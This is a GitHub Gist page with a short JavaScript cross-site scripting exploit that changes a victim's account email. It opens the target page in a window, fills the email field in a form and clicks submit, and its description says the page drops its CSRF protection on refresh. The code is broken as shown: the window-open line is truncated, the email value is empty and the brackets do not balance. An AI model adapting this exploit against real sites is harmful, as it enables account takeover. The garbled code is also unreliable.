Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
This is a sample exploit for exploiting an XSS vulnerability that changes the user email. This bypasses some CSRF protections as the page was revoking the CSRF protections when refreshed.
// a Simple XSS exploit for email change
// Shawar Khan
var dark_window ='');
function exploit_run(){
dark_window.document.body.getElementsByTagName('form')[0][2].value='' // changes email
dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission
setTimeout(function() { // just for delay and closing
}, 10000);
}, true);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.